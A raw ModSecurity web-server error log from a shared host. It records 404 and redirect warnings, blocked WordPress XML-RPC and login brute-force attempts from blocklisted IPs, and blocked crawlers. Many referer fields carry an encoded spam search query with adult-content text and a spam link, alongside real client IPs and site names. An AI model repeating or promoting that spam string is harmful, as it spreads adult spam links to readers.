[Tue May 26 14:06:17.149802 2026] [security2:error] [pid 578581:tid 578823] [client 122.114.252.76:49319] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgZm_8al1sb-umPuLeQAAAHA"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:17.166107 2026] [security2:error] [pid 578581:tid 578768] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbgJm_8al1sb-umPuLbAAAADk"]
[Tue May 26 14:06:17.587445 2026] [security2:error] [pid 578581:tid 578779] [client 122.114.252.76:49336] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgZm_8al1sb-umPuLhQAAAEQ"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:17.629880 2026] [security2:error] [pid 578581:tid 578675] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbgZm_8al1sb-umPuLhgAAGl0"]
[Tue May 26 14:06:17.630041 2026] [security2:error] [pid 578581:tid 578737] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVbgZm_8al1sb-umPuLhgAAGl0"]
[Tue May 26 14:06:18.065063 2026] [security2:error] [pid 578581:tid 578763] [client 122.114.252.76:49340] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgZm_8al1sb-umPuLmAAAADQ"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:18.180566 2026] [security2:error] [pid 578581:tid 578790] [client 122.114.252.76:49341] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgZm_8al1sb-umPuLnQAAAE8"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:18.257658 2026] [security2:error] [pid 578581:tid 578762] [client 122.114.252.76:49339] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgpm_8al1sb-umPuLoAAAADM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:18.382009 2026] [security2:error] [pid 578581:tid 578778] [client 122.114.252.76:49342] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgpm_8al1sb-umPuLpQAAAEM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:18.676585 2026] [security2:error] [pid 578581:tid 578799] [client 202.141.30.10:65487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbgpm_8al1sb-umPuLrwAAAFg"]
[Tue May 26 14:06:18.676716 2026] [security2:error] [pid 578581:tid 578799] [client 202.141.30.10:65487] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbgpm_8al1sb-umPuLrwAAAFg"]
[Tue May 26 14:06:19.500727 2026] [security2:error] [pid 578581:tid 578727] [client 122.114.252.76:49344] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbg5m_8al1sb-umPuLwgAAABA"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:19.727842 2026] [security2:error] [pid 578581:tid 578779] [client 122.114.252.76:49346] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbg5m_8al1sb-umPuLzAAAAEQ"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:19.768718 2026] [security2:error] [pid 578581:tid 578752] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbg5m_8al1sb-umPuLxQAAACk"]
[Tue May 26 14:06:20.087617 2026] [security2:error] [pid 578581:tid 578792] [client 122.114.252.76:49352] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbg5m_8al1sb-umPuL2gAAAFE"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:20.165557 2026] [security2:error] [pid 578581:tid 578813] [client 209.61.59.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbg5m_8al1sb-umPuL1gAAAGY"]
[Tue May 26 14:06:20.274779 2026] [security2:error] [pid 578581:tid 578723] [client 122.114.252.76:49353] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbhJm_8al1sb-umPuL4QAAAAw"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:21.015009 2026] [security2:error] [pid 578581:tid 578826] [client 122.114.252.76:49356] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbhJm_8al1sb-umPuL9gAAAHM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:21.224885 2026] [security2:error] [pid 578581:tid 578814] [client 122.114.252.76:49358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbhZm_8al1sb-umPuMAwAAAGc"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:21.395830 2026] [security2:error] [pid 578581:tid 578827] [client 122.114.252.76:49357] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbhZm_8al1sb-umPuMBAAAAHQ"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:21.493407 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbhZm_8al1sb-umPuL_wAAAGA"]
[Tue May 26 14:06:22.246928 2026] [security2:error] [pid 578581:tid 578788] [client 122.114.252.76:49361] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbhpm_8al1sb-umPuMJAAAAE0"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:23.290285 2026] [security2:error] [pid 578581:tid 578718] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbhpm_8al1sb-umPuMQAAAAAc"]
[Tue May 26 14:06:24.635339 2026] [security2:error] [pid 578581:tid 578794] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbiJm_8al1sb-umPuMigAAAFM"]
[Tue May 26 14:06:24.979121 2026] [security2:error] [pid 578581:tid 578595] [remote 47.128.46.90:11794] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahVbiJm_8al1sb-umPuMpwAAWQ0"]
[Tue May 26 14:06:26.278553 2026] [security2:error] [pid 578581:tid 578765] [client 95.70.131.179:64177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVbipm_8al1sb-umPuM_wAAADY"]
[Tue May 26 14:06:26.278683 2026] [security2:error] [pid 578581:tid 578765] [client 95.70.131.179:64177] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVbipm_8al1sb-umPuM_wAAADY"]
[Tue May 26 14:06:26.506455 2026] [security2:error] [pid 578581:tid 578736] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbipm_8al1sb-umPuM-QAAABk"]
[Tue May 26 14:06:27.193400 2026] [security2:error] [pid 578581:tid 578782] [client 114.119.131.206:21957] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/wp-content/uploads/2017/11/chocolate-rasberry-01-300x300.jpg"] [unique_id "ahVbi5m_8al1sb-umPuNFgAAAEc"], referer: http://haddingtonwines.com/wp-content/uploads/2017/11/chocolate-rasberry-01-300x300.jpg
[Tue May 26 14:06:27.969178 2026] [security2:error] [pid 578581:tid 578731] [client 122.114.252.76:49395] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbi5m_8al1sb-umPuNMQAAABQ"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:27.969641 2026] [security2:error] [pid 578581:tid 578772] [client 122.114.252.76:49390] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbi5m_8al1sb-umPuNMgAAAD0"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:27.976173 2026] [security2:error] [pid 578581:tid 578812] [client 122.114.252.76:49393] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbi5m_8al1sb-umPuNMAAAAGU"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.015229 2026] [security2:error] [pid 578581:tid 578768] [client 122.114.252.76:49391] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbi5m_8al1sb-umPuNMwAAADk"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.066717 2026] [security2:error] [pid 578581:tid 578831] [client 122.114.252.76:49394] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNOQAAAHg"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.089862 2026] [security2:error] [pid 578581:tid 578817] [client 122.114.252.76:49392] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNPAAAAGo"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.530133 2026] [security2:error] [pid 578581:tid 578746] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNPwAAACM"]
[Tue May 26 14:06:28.967407 2026] [security2:error] [pid 578581:tid 578766] [client 122.114.252.76:49409] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNWAAAADc"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.972250 2026] [security2:error] [pid 578581:tid 578816] [client 122.114.252.76:49407] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNWQAAAGk"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:28.999913 2026] [security2:error] [pid 578581:tid 578799] [client 122.114.252.76:49404] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNVAAAAFg"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:29.012534 2026] [security2:error] [pid 578581:tid 578810] [client 122.114.252.76:49405] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjJm_8al1sb-umPuNVgAAAGM"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:29.191875 2026] [security2:error] [pid 578581:tid 578762] [client 122.114.252.76:49406] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjZm_8al1sb-umPuNWgAAADM"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:29.209029 2026] [security2:error] [pid 578581:tid 578834] [client 122.114.252.76:49410] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjZm_8al1sb-umPuNZAAAAHs"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:29.497956 2026] [security2:error] [pid 578581:tid 578803] [client 202.141.30.10:35440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbjZm_8al1sb-umPuNawAAAFw"]
[Tue May 26 14:06:29.498569 2026] [security2:error] [pid 578581:tid 578803] [client 202.141.30.10:35440] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbjZm_8al1sb-umPuNawAAAFw"]
[Tue May 26 14:06:29.963114 2026] [security2:error] [pid 578581:tid 578777] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbjZm_8al1sb-umPuNbgAAAEI"]
[Tue May 26 14:06:30.084005 2026] [security2:error] [pid 578581:tid 578724] [client 122.114.252.76:49423] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjZm_8al1sb-umPuNfAAAAA0"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:30.205648 2026] [security2:error] [pid 578581:tid 578802] [client 122.114.252.76:49431] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjpm_8al1sb-umPuNhgAAAFs"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:30.231115 2026] [security2:error] [pid 578581:tid 578717] [client 122.114.252.76:49422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjpm_8al1sb-umPuNhAAAAAY"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:30.255746 2026] [security2:error] [pid 578581:tid 578718] [client 122.114.252.76:49424] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjpm_8al1sb-umPuNhQAAAAc"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:30.372518 2026] [security2:error] [pid 578581:tid 578725] [client 122.114.252.76:49432] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjpm_8al1sb-umPuNigAAAA4"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:30.848776 2026] [security2:error] [pid 578581:tid 578766] [client 122.114.252.76:49438] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbjpm_8al1sb-umPuNmwAAADc"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:31.288280 2026] [security2:error] [pid 578581:tid 578837] [client 122.114.252.76:49441] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbj5m_8al1sb-umPuNogAAAH4"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:31.336033 2026] [security2:error] [pid 578581:tid 578758] [client 122.114.252.76:49439] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbj5m_8al1sb-umPuNowAAAC8"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:31.447691 2026] [security2:error] [pid 578581:tid 578720] [client 122.114.252.76:49440] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbj5m_8al1sb-umPuNswAAAAk"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:31.824447 2026] [security2:error] [pid 578581:tid 578698] [remote 193.42.61.12:57614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVbj5m_8al1sb-umPuNuwAAS3Q"]
[Tue May 26 14:06:32.051737 2026] [security2:error] [pid 578581:tid 578823] [client 122.114.252.76:49443] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbj5m_8al1sb-umPuNvAAAAHA"], referer: https://panda-eco.com/investor-centre-reports/
[Tue May 26 14:06:32.077953 2026] [security2:error] [pid 578581:tid 578750] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbj5m_8al1sb-umPuNugAAACc"]
[Tue May 26 14:06:32.113180 2026] [security2:error] [pid 578581:tid 578797] [client 122.114.252.76:49446] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbkJm_8al1sb-umPuNywAAAFY"], referer: https://panda-eco.com/investor-centre-reports/
